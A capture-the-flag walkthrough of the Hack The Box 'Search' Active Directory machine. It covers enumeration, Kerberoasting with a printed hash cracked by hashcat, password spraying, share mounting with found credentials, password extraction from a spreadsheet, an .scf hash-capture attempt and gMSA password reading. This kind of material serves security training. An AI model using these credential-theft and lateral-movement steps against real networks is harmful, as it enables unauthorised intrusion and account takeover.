HTB - Search

Machine Info

Search is a hard difficulty Windows machine that focuses on Active Directory enumeration and exploitation techniques. Foothold is obtained by finding exposed credentials in a web page, enumerating AD users, running a Kerberoast attack to obtain a crackable hash for a service account and spraying the password against a subset of the discovered accounts, obtaining access to a SMB share where a protected XLSX file containing user data is found. Unprotecting the file leads to a second set of credentials, which gives access to another share where PKCS#12 certificates can be downloaded. After importing the certificates into a web browser, Windows PowerShell Web Access can be used to obtain an interactive shell on the system. Due to misconfigured ACLs, the user can retrieve the password of a group managed service account which can change the password of an administrative user, resulting in high-privileged access to the system via wmiexec or psexec.

Enumeration

Scope

IP Address: 10.10.11.129

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack
80/tcp   open  http             syn-ack
88/tcp   open  kerberos-sec     syn-ack
135/tcp  open  msrpc            syn-ack
139/tcp  open  netbios-ssn      syn-ack
443/tcp  open  https            syn-ack
445/tcp  open  microsoft-ds     syn-ack
636/tcp  open  ldapssl          syn-ack
3268/tcp open  globalcatLDAP    syn-ack
3269/tcp open  globalcatLDAPssl syn-ack
8172/tcp open  unknown          syn-ack
9389/tcp open  adws             syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p53,80,88,135,139,443,445,636,3268,3269,8172,9389 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Search — Just Testing IIS
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-13 08:44:58Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_ssl-date: 2024-07-13T08:46:28+00:00; +4s from scanner time.
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
| http-methods: 
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds?
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2024-07-13T08:46:28+00:00; +4s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-13T08:46:28+00:00; +4s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-13T08:46:28+00:00; +4s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
8172/tcp open  ssl/http      Microsoft IIS httpd 10.0
|_ssl-date: 2024-07-13T08:46:28+00:00; +4s from scanner time.
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after:  2030-04-05T09:05:25
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 3s
| smb2-time: 
|   date: 2024-07-13T08:45:49
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

* Open ports: 53,80,88,135,139,443,445,636,3268,3269,8172,9389
* UDP Open ports: 53,88,123,389
* Services: DNS - HTTP - HTTPS - LDAP - KERBEROS - RPC - SMB
* Versions: IIS httpd 10.0
* Important Notes: Domain: search.htb - IIS 10.0 on 8172

SMB Enumeration

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ smbclient -N -L //$ip                       
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.129 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u '' -p '' --shares                            

SMB         10.10.11.129    445    RESEARCH         [+] search.htb\: 
SMB         10.10.11.129    445    RESEARCH         [-] Error enumerating shares: STATUS_ACCESS_DENIED

RPC Enumeration

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ rpcclient -U '%' $ip                     

rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED

HTTP Enumeration

I found both http & https have the same webapp. The most interesting thing for the first eye is Our Team section that could be use as usernames'

I created a wordlist of their names and run username-anarchy on them to make different combinations

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ cat users.lst 
Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Thompson
Chris Stewart

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ /opt/username-anarchy/username-anarchy -i users.lst | tee users.list

<snip>
keely.lyons
keelylyo
keellyon

<snip>
daxsantiago
dax.santiago
<snip>

Start to enumerate these users against Kerberos to find if any of them is valid

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ kerbrute userenum --dc $ip -d search.htb -t 100 ./users.list

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/13/24 - Ronnie Flathers @ropnop

2024/07/13 04:57:07 >  Using KDC(s):
2024/07/13 04:57:07 >   10.10.11.129:88

2024/07/13 04:57:07 >  [+] VALID USERNAME:       keely.lyons@search.htb
2024/07/13 04:57:07 >  [+] VALID USERNAME:       dax.santiago@search.htb
2024/07/13 04:57:07 >  [+] VALID USERNAME:       sierra.frye@search.htb

I found one more user when using xato-net-10-million wordlist

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ kerbrute userenum --dc $ip -d search.htb -t 100 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/13/24 - Ronnie Flathers @ropnop

2024/07/13 05:13:59 >  Using KDC(s):
2024/07/13 05:13:59 >   10.10.11.129:88

2024/07/13 05:14:00 >  [+] VALID USERNAME:       administrator@search.htb
2024/07/13 05:14:01 >  [+] VALID USERNAME:       research@search.htb
2024/07/13 05:14:09 >  [+] VALID USERNAME:       Administrator@search.htb

Tried to get ASREP hash from any of these users but also failed

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ impacket-GetNPUsers search.htb/ -dc-ip $ip -no-pass -request -format hashcat -usersfile final.lst 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] User dax.santiago doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User keely.lyons doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sierra.frye doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User research doesn't have UF_DONT_REQUIRE_PREAUTH set

I don't like the following part as it's very like to CTF-Style

Foothold

Auth as hope. Sharp

It says Send Password to Hope Sharp then followed by IsolationIsKey!

Let's do the same thing we did before against that user

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ /opt/username-anarchy/username-anarchy -i hope.user| tee -a hope.wordlist
hope
hopesharp
hope.sharp
hopeshar
hopes
h.sharp
hsharp
shope
s.hope
sharph
sharp
sharp.h
sharp.hope
hs

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ kerbrute userenum --dc $ip -d search.htb -t 100  ./hope.wordlist

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

2024/07/13 05:29:12 >  [+] VALID USERNAME:       hope.sharp@search.htb

One more user found, I will try to authenticate with it

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u hope.sharp  -p 'IsolationIsKey?'

SMB     10.10.11.129    445    RESEARCH   [+] search.htb\hope.sharp:IsolationIsKey? 

I will then begin to enumerate the domain with the credentials I found and start with smb shares

I have Read access on several shares and Read, Write access on RedirectedFolders$

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u hope.sharp  -p 'IsolationIsKey?' -M spider_plus

SMB         10.10.11.129    445    RESEARCH         [+] search.htb\hope.sharp:IsolationIsKey? 
SPIDER_P... 10.10.11.129    445    RESEARCH         [*] Started spidering plus with option:
SPIDER_P... 10.10.11.129    445    RESEARCH         [*]        DIR: ['print$']
SPIDER_P... 10.10.11.129    445    RESEARCH         [*]        EXT: ['ico', 'lnk']
SPIDER_P... 10.10.11.129    445    RESEARCH         [*]       SIZE: 51200
SPIDER_P... 10.10.11.129    445    RESEARCH         [*]     OUTPUT: /tmp/cme_spider_plus


┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ nano /tmp/cme_spider_plus/10.10.11.129.json 

    "CertEnroll": {
        "Research.search.htb_search-RESEARCH-CA.crt": {
            "atime_epoch": "2020-04-07 03:29:29",
            "ctime_epoch": "2020-04-07 03:29:29",
            "mtime_epoch": "2020-04-07 03:29:29",
            "size": "883 Bytes"
        },
        "nsrev_search-RESEARCH-CA.asp": {
            "atime_epoch": "2020-04-07 03:29:31",
            "ctime_epoch": "2020-04-07 03:29:31",
            "mtime_epoch": "2020-04-07 03:29:31",
            "size": "330 Bytes"
        },
        "search-RESEARCH-CA+.crl": {
            "atime_epoch": "2024-07-13 04:38:27",
            "ctime_epoch": "2020-04-07 03:29:32",
            "mtime_epoch": "2024-07-13 04:38:27",
            "size": "735 Bytes"
        },
        "search-RESEARCH-CA.crl": {
            "atime_epoch": "2024-07-13 04:38:25",
            "ctime_epoch": "2020-04-07 03:29:32",
            "mtime_epoch": "2024-07-13 04:38:25",
            "size": "931 Bytes"
        }
        
<snip>

        "sierra.frye/Desktop/user.txt": {
            "atime_epoch": "2021-11-17 19:55:27",
            "ctime_epoch": "2021-11-17 19:55:27",
            "mtime_epoch": "2021-11-17 20:18:26",
            "size": "33 Bytes"
        },
        "sierra.frye/user.txt": {
            "atime_epoch": "2021-11-17 19:55:27",
            "ctime_epoch": "2021-11-17 19:55:27",
            "mtime_epoch": "2021-11-17 20:01:45",
            "size": "33 Bytes

<snip>

        "search.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml": {
            "atime_epoch": "2020-04-07 08:25:21",
            "ctime_epoch": "2020-04-07 08:25:14",
            "mtime_epoch": "2020-04-07 08:25:21",
            "size": "634 Bytes"
        },
        "search.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Services/Services.xml": {
            "atime_epoch": "2020-04-09 16:40:35",
            "ctime_epoch": "2020-04-09 16:39:42",
            "mtime_epoch": "2020-04-09 16:40:35",
            "size": "693 Bytes"

I will connect to smb server and download the files found

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ smbclient -U hope.sharp \\\\$ip\\CertEnroll
Password for [WORKGROUP\hope.sharp]:

smb: \> ls
  .                                  Dc        0  Sat Jul 13 04:38:27 2024
  ..                                 Dc        0  Sat Jul 13 04:38:27 2024
  nsrev_search-RESEARCH-CA.asp       Ac      330  Tue Apr  7 03:29:31 2020
  Research.search.htb_search-RESEARCH-CA.crt     Ac      883  Tue Apr  7 03:29:29 2020
  search-RESEARCH-CA+.crl            Ac      735  Sat Jul 13 04:38:27 2024
  search-RESEARCH-CA.crl             Ac      931  Sat Jul 13 04:38:25 2024

smb: \> mget *

Do the same thing for Group.xmls & Service.xmls. I didn't find anything in them anyway :)

The share RedirectedFolders$ is important and has several folders in it, So I will mount it to my kali machine

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ sudo mount -t cifs "\\\\$ip\\RedirectedFolders$" ./mount -o "username=hope.sharp,password=IsolationIsKey?"
[sudo] password for kali: 

┌──(kali㉿kali)-[~/…/HTB/machines/Search/mount]
└─$ ls
Angie.Duffy   Cameron.Melendez  Cortez.Hickman  Edith.Walls     Reginald.Morton    abril.suarez   chanel.bell   edgar.jacobs  frederick.cuevas  jayla.roberts  santino.benjamin  trace.ryan
Antony.Russo  Claudia.Pugh      Eddie.Stevens   Jordan.Gregory  Savanah.Velazquez  belen.compton  dax.santiago  eve.galvan    hope.sharp        payton.harmon  sierra.frye

The folder sierra.frya contain the flag but I couldn't read it.

When we have Write access on specific share, we could put Shell command file (.scf) on it and if any user explore the share - not necessarily to open the file - it will connect to my smb server

I also tried to put .scf on the share but with no luck :(

Auth with web_svc

Running bloodhound to collect information while attempting get kerberoastable users

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ bloodhound-python -u 'hope.sharp' -p 'IsolationIsKey?' -ns $ip -d search.htb -c all
<snip>

Since, I have valid username and password I will try to find if there is any kerberoastable account

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ impacket-GetUserSPNs search.htb/hope.sharp:'IsolationIsKey?' -dc-ip $ip  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName               Name     MemberOf  PasswordLastSet             LastLogon  Delegation 
---------------------------------  -------  --------  --------------------------  ---------  ----------
RESEARCH/web_svc.search.htb:60001  web_svc            2020-04-09 08:59:11.329031  <never>               


┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ impacket-GetUserSPNs search.htb/hope.sharp:'IsolationIsKey?' -dc-ip $ip  -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName               Name     MemberOf  PasswordLastSet             LastLogon  Delegation 
---------------------------------  -------  --------  --------------------------  ---------  ----------
RESEARCH/web_svc.search.htb:60001  web_svc            2020-04-09 08:59:11.329031  <never>               

[-] CCache file is not found. Skipping...
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$f3f3fd4fb0614c575add9b79b9965c17$6b816bedbacc2f81ecf9312be18bba19d3d028c0e5be49399fb677d22fdd04950e9faf80f78ad046e003a0ab373e3542fbdb7b3e55fe24b838f7b4d433837e3fa36600141084aedeb74cf4ba9b9b108235e3ab256e47fb37ae4c49380b72faeeb90366c857b1ff9fc8e7bf35d584a90b455dbaa113221485ec524a72fa02160ad3ef2081d629f476805598791cb6bc6de576c82ef96e62ba729523f1302bdad997fc727ad91e1e642f8d458acb62e512014f186fc41d642ef6d32fc5d375cec6989f135f9f9701bf4706cdb8185de61b4bd55144f2b755d84cd13113f43f224b1277dee3f6a770f908d05eaa8eb9897fa6f151c0dfcdaa3bfc473f6826ea72d9edbb1ec5710ec05378039cbb0469f30a22b1fb6d46fca8e9838beeca0879138ca8c01f1c34803d9c91b2b9d53f310d921c2245873496f51c19f6510a51ff7ce71136a7c48cbabf1e37d045d90f78b12d16f50f5df4144e4569fb35551d1d943d32d8e59d237e672587985a16c0a2744aa6571062f7a882f0a1502bd23f51198fb312399fa7b7caba16d67834c0099488100f569eb5f3cc30e2e7957d21c4948d44ba824657d87efa292197dbc12fc178ddcb4b24bd8dda75c5123346dc57fccc6373291985826d30be3e80c748eb296ab516a86acc16376dfd047e508159cdbd967babf8bad80a33824f92a772d5c18e69966fa9cc216c8e88fb4cfb050cfdeccaba80ea26b027fbad96dd03534aa8f7cdf60a310a45d81d1d9f596466617b5b0b2b4c6d3160483118359d68cc1a2e145ff47254ff53be12658db5eefa933533f6417607c865fac6fc70935719a2a8955c0dec44f3475dcdfc9b0ada516cb49fe136655ea63e71e757116cb4a775a4c13a535718cb631f68a2f013f873249526d7461fa5d61c46288624be1ec7e233f263f2cdfd5a1b81f89f82455261af2880dbe7bb19d3bea2bab1e00ec76bf7751e9d862554b6b0b8df7c03ca2159cab24c68c0c66ca42fb8615464d12115a83c1d73c936c95205ff6b9d93a283b21aabca8698dfad71310d9c84b259f9c7764b9676b4d01426c6ecdaaeabae269c4d4fde33b070eae96e0b7284861ddeeb237c0be49976a75e91c82be41c3e766467aa942b73e8bb2619bf5be4f10f5d018538633105ed817ebac5488d363e66c19e5a1848adfae25094860b7730c8cf4a631f514d1f04f298e85354a42fdba67b4dfc8a5da19efc185bb2348955bf04411088061a1e440a89f60fdbb80967da565d4b5e3ac722510f1529ec3df25bd06cb7e708db884a092e84c5ae9b9c0c31a70641816a7ed8bf9e190ae46058ae582db2b2808db2b5a962ade01e191a311e0854f6f37fe99e60f3014526a3a6ff32a72c227bd2fc055c4dfde32f4250e003aedd2d7281e52e1f1a4396c8c655fd848c609017574254e2776135480dec99c67bfcf4645b6ac2e9c7a50e39802b40c82375d02cf885d36e8d

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ hashcat -m 13100 kerberos.hash /usr/share/wordlists/rockyou.txt 

$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$f3f3fd4fb0614c575add9b79b9965c17$6b816bedbacc2f81ecf9312be18bba19d3d028c0e5be49399fb677d22fdd04950e9faf80f78ad046e003a0ab373e3542fbdb7b3e55fe24b838f7b4d433837e3fa36600141084aedeb74cf4ba9b9b108235e3ab256e47fb37ae4c49380b72faeeb90366c857b1ff9fc8e7bf35d584a90b455dbaa113221485ec524a72fa02160ad3ef2081d629f476805598791cb6bc6de576c82ef96e62ba729523f1302bdad997fc727ad91e1e642f8d458acb62e512014f186fc41d642ef6d32fc5d375cec6989f135f9f9701bf4706cdb8185de61b4bd55144f2b755d84cd13113f43f224b1277dee3f6a770f908d05eaa8eb9897fa6f151c0dfcdaa3bfc473f6826ea72d9edbb1ec5710ec05378039cbb0469f30a22b1fb6d46fca8e9838beeca0879138ca8c01f1c34803d9c91b2b9d53f310d921c2245873496f51c19f6510a51ff7ce71136a7c48cbabf1e37d045d90f78b12d16f50f5df4144e4569fb35551d1d943d32d8e59d237e672587985a16c0a2744aa6571062f7a882f0a1502bd23f51198fb312399fa7b7caba16d67834c0099488100f569eb5f3cc30e2e7957d21c4948d44ba824657d87efa292197dbc12fc178ddcb4b24bd8dda75c5123346dc57fccc6373291985826d30be3e80c748eb296ab516a86acc16376dfd047e508159cdbd967babf8bad80a33824f92a772d5c18e69966fa9cc216c8e88fb4cfb050cfdeccaba80ea26b027fbad96dd03534aa8f7cdf60a310a45d81d1d9f596466617b5b0b2b4c6d3160483118359d68cc1a2e145ff47254ff53be12658db5eefa933533f6417607c865fac6fc70935719a2a8955c0dec44f3475dcdfc9b0ada516cb49fe136655ea63e71e757116cb4a775a4c13a535718cb631f68a2f013f873249526d7461fa5d61c46288624be1ec7e233f263f2cdfd5a1b81f89f82455261af2880dbe7bb19d3bea2bab1e00ec76bf7751e9d862554b6b0b8df7c03ca2159cab24c68c0c66ca42fb8615464d12115a83c1d73c936c95205ff6b9d93a283b21aabca8698dfad71310d9c84b259f9c7764b9676b4d01426c6ecdaaeabae269c4d4fde33b070eae96e0b7284861ddeeb237c0be49976a75e91c82be41c3e766467aa942b73e8bb2619bf5be4f10f5d018538633105ed817ebac5488d363e66c19e5a1848adfae25094860b7730c8cf4a631f514d1f04f298e85354a42fdba67b4dfc8a5da19efc185bb2348955bf04411088061a1e440a89f60fdbb80967da565d4b5e3ac722510f1529ec3df25bd06cb7e708db884a092e84c5ae9b9c0c31a70641816a7ed8bf9e190ae46058ae582db2b2808db2b5a962ade01e191a311e0854f6f37fe99e60f3014526a3a6ff32a72c227bd2fc055c4dfde32f4250e003aedd2d7281e52e1f1a4396c8c655fd848c609017574254e2776135480dec99c67bfcf4645b6ac2e9c7a50e39802b40c82375d02cf885d36e8d:@3ONEmillionbaby

Session..........: hashcat
Status...........: Cracked

I created a wordlist for domain usernames from rpcclient then going to password spray the password of user web_svc since I didn't find anything interesting about that user on bloodhound or in shares.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ rpcclient -U 'web_svc%@3ONEmillionbaby' $ip -c "enumdomusers" | cut -d: -f2 | cut -d"[" -f2 | cut -d"]" -f1 | tee -a domain_users.list

<snip>
Amare.Serrano
Savanah.Knox
Frederick.Cuevas
Marshall.Skinner
Edgar.Jacobs
Elisha.Watts
Belen.Compton
Amari.Mora
Cadence.Conner
Katelynn.Costa
<snip>

Auth with Edgar.Jacobs

Got a hit with user Edgar.Jacobs

I looked at bloodhound to see if this user has any high privileges but unlucky, So I will enumerate the shares with that user.

• On Starting spider_plus module with crackmapexec, I found that:

  • helpdesk share is empty

  • RedirectedFolders$ has an interesting file at edgar.jacobs/Desktop/Phishing_Attempt.xlsx which can contain valid credentials or important data

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u Edgar.Jacobs  -p '@3ONEmillionbaby' -M spider_plus
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [+] search.htb\Edgar.Jacobs:@3ONEmillionbaby 
SPIDER_P... 10.10.11.129    445    RESEARCH         [*] Started spidering plus with option:
SPIDER_P... 10.10.11.129    445    RESEARCH         [*]        DIR: ['print$']
SPIDER_P... 10.10.11.129    445    RESEARCH         [*]        EXT: ['ico', 'lnk']
SPIDER_P... 10.10.11.129    445    RESEARCH         [*]       SIZE: 51200
SPIDER_P... 10.10.11.129    445    RESEARCH         [*]     OUTPUT: /tmp/cme_spider_plus


    "helpdesk": {}
<snip>

    "RedirectedFolders$": {
        "edgar.jacobs/Desktop/Phishing_Attempt.xlsx": {
            "atime_epoch": "2020-08-10 06:30:05",
            "ctime_epoch": "2020-04-09 16:06:41",
            "mtime_epoch": "2020-08-10 06:30:05",
            "size": "22.59 KB"
        },

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ smbclient -U Edgar.Jacobs \\\\$ip\\RedirectedFolders$
Password for [WORKGROUP\Edgar.Jacobs]:

smb: \> cd edgar.jacobs\Desktop\
smb: \edgar.jacobs\Desktop\> get Phishing_Attempt.xlsx 

Privilege Escalation

Shell as sierra.frye

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ exiftool Phishing_Attempt.xlsx

<snip>
File Type                       : XLSX
File Type Extension             : xlsx
MIME Type                       : application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
Zip Required Version            : 20
Zip Bit Flag                    : 0x0006
Zip Compression                 : Deflated
Zip Modify Date                 : 1980:01:01 00:00:00
Zip CRC                         : 0xcc14a176
Zip Compressed Size             : 442
Zip Uncompressed Size           : 1996
Zip File Name                   : [Content_Types].xml
Last Modified By                : Edgar Jacobs
<snip>

The file is xlsx file and zip compressed, I will view it in MicroSoft Excel

It has two sheets Passwords 01082020 & Captured

Passwords 01082020

Captured

There was no interesting data in the two sheets so I will unzip the file and explore it

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ unzip Phishing_Attempt.xlsx
Archive:  Phishing_Attempt.xlsx
  inflating: [Content_Types].xml     
  inflating: _rels/.rels             
  inflating: xl/workbook.xml         
  inflating: xl/_rels/workbook.xml.rels  
  inflating: xl/worksheets/sheet1.xml  
  inflating: xl/worksheets/sheet2.xml  
  inflating: xl/theme/theme1.xml     
  inflating: xl/styles.xml           
  inflating: xl/sharedStrings.xml    
  inflating: xl/drawings/drawing1.xml  
  inflating: xl/charts/chart1.xml    
  inflating: xl/charts/style1.xml    
  inflating: xl/charts/colors1.xml   
  inflating: xl/worksheets/_rels/sheet1.xml.rels  
  inflating: xl/worksheets/_rels/sheet2.xml.rels  
  inflating: xl/drawings/_rels/drawing1.xml.rels  
  inflating: xl/charts/_rels/chart1.xml.rels  
  inflating: xl/printerSettings/printerSettings1.bin  
  inflating: xl/printerSettings/printerSettings2.bin  
  inflating: xl/calcChain.xml        
  inflating: docProps/core.xml       
  inflating: docProps/app.xml 

sharedStrings.xml file has the content of the sheet two but there is more data than xlsx when I opened it with microsoft Excel.

The new data located between these tags <t>*</t>.

┌──(kali㉿kali)-[~/…/HTB/machines/Search/xlsx]
└─$ cat xl/sharedStrings.xml             
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="49" uniqueCount="49"><si><t>firstname</t></si><si><t>lastname</t></si><si><t>password</t></si><si><t>Payton</t></si><si><t>Harmon</t></si><si><t>Cortez</t></si><si><t>Hickman</t></si><si><t>Bobby</t></si><si><t>Wolf</t></si><si><t>Margaret</t></si><si><t>Robinson</t></si><si><t>Costa</t></si><si><t>Scarlett</t></si><si><t>Parks</t></si><si><t>Eliezer</t></si><si><t>Jordan</t></si><si><t>Hunter</t></si><si><t>Kirby</t></si><si><t>Annabelle</t></si><si><t>Wells</t></si><si><t>Eve</t></si><si><t>Galvan</t></si><si><t>Jeramiah</t></si><si><t>Fritz</t></si><si><t>Abby</t></si><si><t>Gonzalez</t></si><si><t>Joy</t></si><si><t>Vincent</t></si><si><t>Sutton</t></si><si><t>Sierra</t></si><si><t>Frye</t></si><si><t>Username</t></si><si><t>Date</t></si><si><t>Captured Passwords</t></si><si><t>IT ChangeOver Keely Lyons Started</t></si><si><t>//51+mountain+DEAR+noise+83//</t></si><si><t>++47|building|WARSAW|gave|60++</t></si><si><t>!!05_goes_SEVEN_offer_83!!</t></si><si><t>~~27%when%VILLAGE%full%00~~</t></si><si><t>==95~pass~QUIET~austria~77==</t></si><si><t>//61!banker!FANCY!measure!25//</t></si><si><t>??40:student:MAYOR:been:66??</t></si><si><t>&amp;&amp;75:major:RADIO:state:93&amp;&amp;</t></si><si><t>**30*venus*BALL*office*42**</t></si><si><t>;;36!cried!INDIA!year!50;;</t></si><si><t>..10-time-TALK-proud-66..</t></si><si><t>??47^before^WORLD^surprise^91??</t></si><si><t>**24&amp;moment&amp;BRAZIL&amp;members&amp;66**</t></si><si><t>$$49=wide=STRAIGHT=jordan=28$$18</t></si></sst> 

I created a wordlist of these records and start to brute force against user sierra.frye and I got a hit

I mounted the share Redirectedfolders$ as user sierra.frya

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ sudo mount -t cifs "\\\\$ip\\Redirectedfolders$" ./mount -o 'username=sierra.frye,password=$$49=wide=STRAIGHT=jordan=28$$18'

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ cd mount/sierra.frye  

┌──(kali㉿kali)-[~/…/machines/Search/mount/sierra.frye]
└─$ tree            
.
├── Desktop
│   ├── $RECYCLE.BIN
│   │   └── desktop.ini
│   ├── @rce.scf
│   ├── Microsoft Edge.lnk
│   ├── desktop.ini
│   └── user.txt
├── Documents
│   ├── $RECYCLE.BIN
│   │   └── desktop.ini
│   └── desktop.ini
├── Downloads
│   ├── $RECYCLE.BIN
│   │   └── desktop.ini
│   ├── Backups
│   │   ├── search-RESEARCH-CA.p12
│   │   └── staff.pfx
│   └── desktop.ini
└── user.txt

• There are two new files I didn't see before under Backups folder search-RESEARCH-CA.p12 & staff.pfx

These two files can be uploaded to your browser and access the webapp on port 443 that lead to PowerShell Web Access Console, but I took different path :) .

Get the flag

┌──(kali㉿kali)-[~/…/machines/Search/mount/sierra.frye]
└─$ cat user.txt 
07129b5634467dbe9cxxxxxxxxxx

User Flag: 07129b5634467dbxxxxxxxxxxx

Shell as Administrator

• User sierra.frye can PSRemote to the machine as it's member of BIRMINGHAM-ITSEC which is member of IISEC

• ITSEC has the privileges to read GMSA password

• Group BIR-ADFS-GMSA$ has GenericAll rights on user Tristan.davies which is a member of the domain admins group

So, if we can takeover sierra.frye user, we can reach Domain Admins from the attack path above

More about GMSA from bloodhound

Read GMSA password with gMSADumper.py or NetExec

GitHub - micahvandeusen/gMSADumper: Lists who can read any gMSA password blobs and parses them if the current user has access.GitHub

Extract gMSA Secrets | NetExec

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ nxc ldap $ip -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' --gmsa

<snip>
